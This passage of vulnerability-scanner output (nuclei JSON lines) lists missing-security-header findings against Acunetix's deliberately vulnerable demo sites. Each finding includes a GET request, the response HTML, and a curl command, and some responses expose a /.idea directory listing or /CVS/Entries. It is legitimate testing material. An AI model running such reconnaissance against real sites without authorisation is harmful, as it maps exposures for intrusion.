style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.\\u003c/p\\u003e\\n\\t\\u003c/div\\u003e\\n\\n \\u003cfooter\\u003e\\n \\u003cp\\u003e\\u0026copy; Acunetix Ltd. 2019\\u003c/p\\u003e\\n \\u003c/footer\\u003e\\n\\n\\u003c/div\\u003e\\u003c!--/.fluid-container--\\u003e\\n\\n\\u003c!-- Le javascript\\n================================================== --\\u003e\\n\\u003c!-- Placed at the end of the document so the pages load faster --\\u003e\\n\\u003cscript src=\\\"http://code.jquery.com/jquery-1.9.1.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/app.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:07.442300597Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 AVG/123.0.0.0' 'http://testhtml5.vulnweb.com/report'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-resource-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/CVS/Entries\",\"path\":\"/CVS/Entries\",\"matched-at\":\"http://testphp.vulnweb.com/CVS/Entries\",\"request\":\"GET /CVS/Entries HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 Edg/84.0.522.52\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 1\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nEtag: \\\"4dca64a4-1\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n \",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:07.594282682Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 Edg/84.0.522.52' 'http://testphp.vulnweb.com/CVS/Entries'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"permissions-policy\",\"type\":\"http\",\"host\":\"testasp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testasp.vulnweb.com/–\",\"path\":\"/–\",\"matched-at\":\"http://testasp.vulnweb.com/%E2%80%93\",\"request\":\"GET /%E2%80%93 HTTP/1.1\\r\\nHost: testasp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nContent-Length: 1245\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:40:45 GMT\\r\\nServer: Microsoft-IIS/8.5\\r\\nX-Powered-By: ASP.NET\\r\\n\\r\\n\\u003c!DOCTYPE html PUBLIC \\\"-//W3C//DTD XHTML 1.0 Strict//EN\\\" \\\"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\\\"\\u003e\\r\\n\\u003chtml xmlns=\\\"http://www.w3.org/1999/xhtml\\\"\\u003e\\r\\n\\u003chead\\u003e\\r\\n\\u003cmeta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=iso-8859-1\\\"/\\u003e\\r\\n\\u003ctitle\\u003e404 - File or directory not found.\\u003c/title\\u003e\\r\\n\\u003cstyle type=\\\"text/css\\\"\\u003e\\r\\n\\u003c!--\\r\\nbody{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}\\r\\nfieldset{padding:0 15px 10px 15px;} \\r\\nh1{font-size:2.4em;margin:0;color:#FFF;}\\r\\nh2{font-size:1.7em;margin:0;color:#CC0000;} \\r\\nh3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} \\r\\n#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:\\\"trebuchet MS\\\", Verdana, sans-serif;color:#FFF;\\r\\nbackground-color:#555555;}\\r\\n#content{margin:0 0 0 2%;position:relative;}\\r\\n.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}\\r\\n--\\u003e\\r\\n\\u003c/style\\u003e\\r\\n\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003cdiv id=\\\"header\\\"\\u003e\\u003ch1\\u003eServer Error\\u003c/h1\\u003e\\u003c/div\\u003e\\r\\n\\u003cdiv id=\\\"content\\\"\\u003e\\r\\n \\u003cdiv class=\\\"content-container\\\"\\u003e\\u003cfieldset\\u003e\\r\\n \\u003ch2\\u003e404 - File or directory not found.\\u003c/h2\\u003e\\r\\n \\u003ch3\\u003eThe resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.\\u003c/h3\\u003e\\r\\n \\u003c/fieldset\\u003e\\u003c/div\\u003e\\r\\n\\u003c/div\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.238.29.244\",\"timestamp\":\"2024-11-13T02:41:07.594309247Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15' 'http://testasp.vulnweb.com/%E2%80%93'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"referrer-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/.idea/.name\",\"path\":\"/.idea/.name\",\"matched-at\":\"http://testphp.vulnweb.com/.idea/.name\",\"request\":\"GET /.idea/.name HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/604.5.2 (KHTML, like Gecko) Version/9.1.2 Safari/604.5.2\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 6\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nEtag: \\\"4f911cd6-6\\\"\\r\\nLast-Modified: Fri, 20 Apr 2012 08:22:46 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\nacuart\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:08.018622964Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/604.5.2 (KHTML, like Gecko) Version/9.1.2 Safari/604.5.2' 'http://testphp.vulnweb.com/.idea/.name'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"strict-transport-security\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com\",\"matched-at\":\"http://testphp.vulnweb.com\",\"request\":\"GET / HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; en-US; rv:122.0esr) Gecko/20100209 Firefox/122.0esr\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 4.01 Transitional//EN\\\"\\n\\\"http://www.w3.org/TR/html4/loose.dtd\\\"\\u003e\\n\\u003chtml\\u003e\\u003c!-- InstanceBegin template=\\\"/Templates/main_dynamic_template.dwt.php\\\" codeOutsideHTMLIsLocked=\\\"false\\\" --\\u003e\\n\\u003chead\\u003e\\n\\u003cmeta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=iso-8859-2\\\"\\u003e\\n\\n\\u003c!-- InstanceBeginEditable name=\\\"document_title_rgn\\\" --\\u003e\\n\\u003ctitle\\u003eHome of Acunetix Art\\u003c/title\\u003e\\n\\u003c!-- InstanceEndEditable --\\u003e\\n\\u003clink rel=\\\"stylesheet\\\" href=\\\"style.css\\\" type=\\\"text/css\\\"\\u003e\\n\\u003c!-- InstanceBeginEditable name=\\\"headers_rgn\\\" --\\u003e\\n\\u003c!-- here goes headers headers --\\u003e\\n\\u003c!-- InstanceEndEditable --\\u003e\\n\\u003cscript language=\\\"JavaScript\\\" type=\\\"text/JavaScript\\\"\\u003e\\n\\u003c!--\\nfunction MM_reloadPage(init) { //reloads the window if Nav4 resized\\n if (init==true) with (navigator) {if ((appName==\\\"Netscape\\\")\\u0026\\u0026(parseInt(appVersion)==4)) {\\n document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}\\n else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();\\n}\\nMM_reloadPage(true);\\n//--\\u003e\\n\\u003c/script\\u003e\\n\\n\\u003c/head\\u003e\\n\\u003cbody\\u003e \\n\\u003cdiv id=\\\"mainLayer\\\" style=\\\"position:absolute; width:700px; z-index:1\\\"\\u003e\\n\\u003cdiv id=\\\"masthead\\\"\\u003e \\n \\u003ch1 id=\\\"siteName\\\"\\u003e\\u003ca href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"images/logo.gif\\\" width=\\\"306\\\" height=\\\"38\\\" border=\\\"0\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u003c/a\\u003e\\u003c/h1\\u003e \\n \\u003ch6 id=\\\"siteInfo\\\"\\u003eTEST and Demonstration site for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e\\u003c/h6\\u003e\\n \\u003cdiv id=\\\"globalNav\\\"\\u003e \\n \\t\\u003ctable border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\"\\u003e\\u003ctr\\u003e\\n\\t\\u003ctd align=\\\"left\\\"\\u003e\\n\\t\\t\\u003ca href=\\\"index.php\\\"\\u003ehome\\u003c/a\\u003e | \\u003ca href=\\\"categories.php\\\"\\u003ecategories\\u003c/a\\u003e | \\u003ca href=\\\"artists.php\\\"\\u003eartists\\n\\t\\t\\u003c/a\\u003e | \\u003ca href=\\\"disclaimer.php\\\"\\u003edisclaimer\\u003c/a\\u003e | \\u003ca href=\\\"cart.php\\\"\\u003eyour cart\\u003c/a\\u003e | \\n\\t\\t\\u003ca href=\\\"guestbook.php\\\"\\u003eguestbook\\u003c/a\\u003e | \\n\\t\\t\\u003ca href=\\\"AJAX/index.php\\\"\\u003eAJAX Demo\\u003c/a\\u003e\\n\\t\\u003c/td\\u003e\\n\\t\\u003ctd align=\\\"right\\\"\\u003e\\n\\t\\t\\u003c/td\\u003e\\n\\t\\u003c/tr\\u003e\\u003c/table\\u003e\\n \\u003c/div\\u003e \\n\\u003c/div\\u003e \\n\\u003c!-- end masthead --\\u003e \\n\\n\\u003c!-- begin content --\\u003e\\n\\u003c!-- InstanceBeginEditable name=\\\"content_rgn\\\" --\\u003e\\n\\u003cdiv id=\\\"content\\\"\\u003e\\n\\t\\u003ch2 id=\\\"pageName\\\"\\u003ewelcome to our page\\u003c/h2\\u003e\\n\\t \\u003cdiv class=\\\"story\\\"\\u003e\\n\\t\\t\\u003ch3\\u003eTest site for Acunetix WVS.\\u003c/h3\\u003e\\n\\t \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\u003c!-- InstanceEndEditable --\\u003e\\n\\u003c!--end content --\\u003e\\n\\n\\u003cdiv id=\\\"navBar\\\"\\u003e \\n \\u003cdiv id=\\\"search\\\"\\u003e \\n \\u003cform action=\\\"search.php?test=query\\\" method=\\\"post\\\"\\u003e \\n \\u003clabel\\u003esearch art\\u003c/label\\u003e \\n \\u003cinput name=\\\"searchFor\\\" type=\\\"text\\\" size=\\\"10\\\"\\u003e \\n \\u003cinput name=\\\"goButton\\\" type=\\\"submit\\\" value=\\\"go\\\"\\u003e \\n \\u003c/form\\u003e \\n \\u003c/div\\u003e \\n \\u003cdiv id=\\\"sectionLinks\\\"\\u003e \\n \\u003cul\\u003e \\n \\u003cli\\u003e\\u003ca href=\\\"categories.php\\\"\\u003eBrowse categories\\u003c/a\\u003e\\u003c/li\\u003e \\n \\u003cli\\u003e\\u003ca href=\\\"artists.php\\\"\\u003eBrowse artists\\u003c/a\\u003e\\u003c/li\\u003e \\n \\u003cli\\u003e\\u003ca href=\\\"cart.php\\\"\\u003eYour cart\\u003c/a\\u003e\\u003c/li\\u003e \\n \\u003cli\\u003e\\u003ca href=\\\"login.php\\\"\\u003eSignup\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t \\u003cli\\u003e\\u003ca href=\\\"userinfo.php\\\"\\u003eYour profile\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t \\u003cli\\u003e\\u003ca href=\\\"guestbook.php\\\"\\u003eOur guestbook\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\u003cli\\u003e\\u003ca href=\\\"AJAX/index.php\\\"\\u003eAJAX Demo\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t \\u003c/li\\u003e \\n \\u003c/ul\\u003e \\n \\u003c/div\\u003e \\n \\u003cdiv class=\\\"relatedLinks\\\"\\u003e \\n \\u003ch3\\u003eLinks\\u003c/h3\\u003e \\n \\u003cul\\u003e \\n \\u003cli\\u003e\\u003ca href=\\\"http://www.acunetix.com\\\"\\u003eSecurity art\\u003c/a\\u003e\\u003c/li\\u003e \\n\\t \\u003cli\\u003e\\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/php-security-scanner/\\\"\\u003ePHP scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t \\u003cli\\u003e\\u003ca href=\\\"https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/\\\"\\u003ePHP vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t \\u003cli\\u003e\\u003ca href=\\\"http://www.eclectasy.com/Fractal-Explorer/index.html\\\"\\u003eFractal Explorer\\u003c/a\\u003e\\u003c/li\\u003e \\n \\u003c/ul\\u003e \\n \\u003c/div\\u003e \\n \\u003cdiv id=\\\"advert\\\"\\u003e \\n \\u003cp\\u003e\\n \\u003cobject classid=\\\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\\\" codebase=\\\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0\\\" width=\\\"107\\\" height=\\\"66\\\"\\u003e\\n \\u003cparam name=\\\"movie\\\" value=\\\"Flash/add.swf\\\"\\u003e\\n \\u003cparam name=quality value=high\\u003e\\n \\u003cembed src=\\\"Flash/add.swf\\\" quality=high pluginspage=\\\"http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash\\\" type=\\\"application/x-shockwave-flash\\\" width=\\\"107\\\" height=\\\"66\\\"\\u003e\\u003c/embed\\u003e\\n \\u003c/object\\u003e\\n \\u003c/p\\u003e\\n \\u003c/div\\u003e \\n\\u003c/div\\u003e \\n\\n\\u003c!--end navbar --\\u003e \\n\\u003cdiv id=\\\"siteInfo\\\"\\u003e \\u003ca href=\\\"http://www.acunetix.com\\\"\\u003eAbout Us\\u003c/a\\u003e | \\u003ca href=\\\"privacy.php\\\"\\u003ePrivacy Policy\\u003c/a\\u003e | \\u003ca href=\\\"mailto:wvs@acunetix.com\\\"\\u003eContact Us\\u003c/a\\u003e | \\u003ca href=\\\"/Mod_Rewrite_Shop/\\\"\\u003eShop\\u003c/a\\u003e | \\u003ca href=\\\"/hpp/\\\"\\u003eHTTP Parameter Pollution\\u003c/a\\u003e | \\u0026copy;2019\\n Acunetix Ltd \\n\\u003c/div\\u003e \\n \\n \\n\\u003cbr\\u003e \\n\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px\\\"\\u003e\\n\\u003cp style=\\\"padding-left:5%;padding-right:5%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.\\u003c/p\\u003e\\n\\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\u003c/body\\u003e\\n\\u003c!-- InstanceEnd --\\u003e\\u003c/html\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:08.018606115Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; en-US; rv:122.0esr) Gecko/20100209 Firefox/122.0esr' 'http://testphp.vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"strict-transport-security\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/.idea\",\"path\":\"/.idea\",\"matched-at\":\"http://testphp.vulnweb.com/.idea/\",\"request\":\"GET /.idea HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 XTPT/1.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:40:51 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003eIndex of /.idea/\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ch1\\u003eIndex of /.idea/\\u003c/h1\\u003e\\u003chr\\u003e\\u003cpre\\u003e\\u003ca href=\\\"../\\\"\\u003e../\\u003c/a\\u003e\\r\\n\\u003ca href=\\\"scopes/\\\"\\u003escopes/\\u003c/a\\u003e 13-Nov-2012 13:29 -\\r\\n\\u003ca href=\\\"acuart.iml\\\"\\u003eacuart.iml\\u003c/a\\u003e 20-Apr-2012 08:22 292\\r\\n\\u003ca href=\\\"encodings.xml\\\"\\u003eencodings.xml\\u003c/a\\u003e 20-Apr-2012 08:22 171\\r\\n\\u003ca href=\\\"misc.xml\\\"\\u003emisc.xml\\u003c/a\\u003e 20-Apr-2012 08:22 266\\r\\n\\u003ca href=\\\"modules.xml\\\"\\u003emodules.xml\\u003c/a\\u003e 20-Apr-2012 08:22 275\\r\\n\\u003ca href=\\\"vcs.xml\\\"\\u003evcs.xml\\u003c/a\\u003e 20-Apr-2012 08:22 173\\r\\n\\u003ca href=\\\"workspace.xml\\\"\\u003eworkspace.xml\\u003c/a\\u003e 20-Apr-2012 08:23 12473\\r\\n\\u003c/pre\\u003e\\u003chr\\u003e\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:08.618705Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 XTPT/1.0' 'http://testphp.vulnweb.com/.idea'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-embedder-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/logout\",\"path\":\"/logout\",\"matched-at\":\"http://testhtml5.vulnweb.com/\",\"request\":\"GET /logout HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.61\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nAccess-Control-Allow-Origin: *\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:50 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html\\u003e\\n\\u003chtml lang=\\\"en\\\" xmlns=\\\"http://www.w3.org/1999/html\\\" data-ng-app=\\\"itemsApp\\\"\\u003e\\n\\u003chead\\u003e\\n \\u003cmeta charset=\\\"utf-8\\\"\\u003e\\n \\u003ctitle\\u003eSecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner\\u003c/title\\u003e\\n \\u003cmeta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"\\u003e\\n \\u003cmeta name=\\\"description\\\" content=\\\"\\\"\\u003e\\n \\u003cmeta name=\\\"author\\\" content=\\\"\\\"\\u003e\\n\\n \\u003c!-- Le styles --\\u003e\\n \\u003clink href=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003clink href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'\\u003e\\n \\u003clink href=\\\"/static/css/style.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n\\n \\u003clink rel=\\\"icon\\\" type=\\\"image/png\\\" href=\\\"http://www.acunetix.com/favicon.ico\\\"\\u003e\\n\\n \\u003cstyle type=\\\"text/css\\\"\\u003e\\n body {\\n padding-top: 60px;\\n padding-bottom: 40px;\\n }\\n .sidebar-nav {\\n padding: 9px 0;\\n }\\n\\n @media (max-width: 980px) {\\n /* Enable use of floated navbar text */\\n .navbar-text.pull-right {\\n float: none;\\n padding-left: 5px;\\n padding-right: 5px;\\n }\\n }\\n \\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\n\\u003cbody\\u003e\\n\\n\\u003cdiv class=\\\"navbar navbar-fixed-top\\\"\\u003e\\n \\u003cdiv class=\\\"navbar-inner\\\"\\u003e\\n \\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"btn btn-navbar\\\" data-toggle=\\\"collapse\\\" data-target=\\\".nav-collapse\\\"\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003c/button\\u003e\\n \\u003ca class=\\\"brand\\\" href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"/static/img/logo2.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u003c/a\\u003e\\n \\u003cp class=\\\"navbar-text pull-left\\\"\\u003e\\n Vulnerable HTML5 test website for 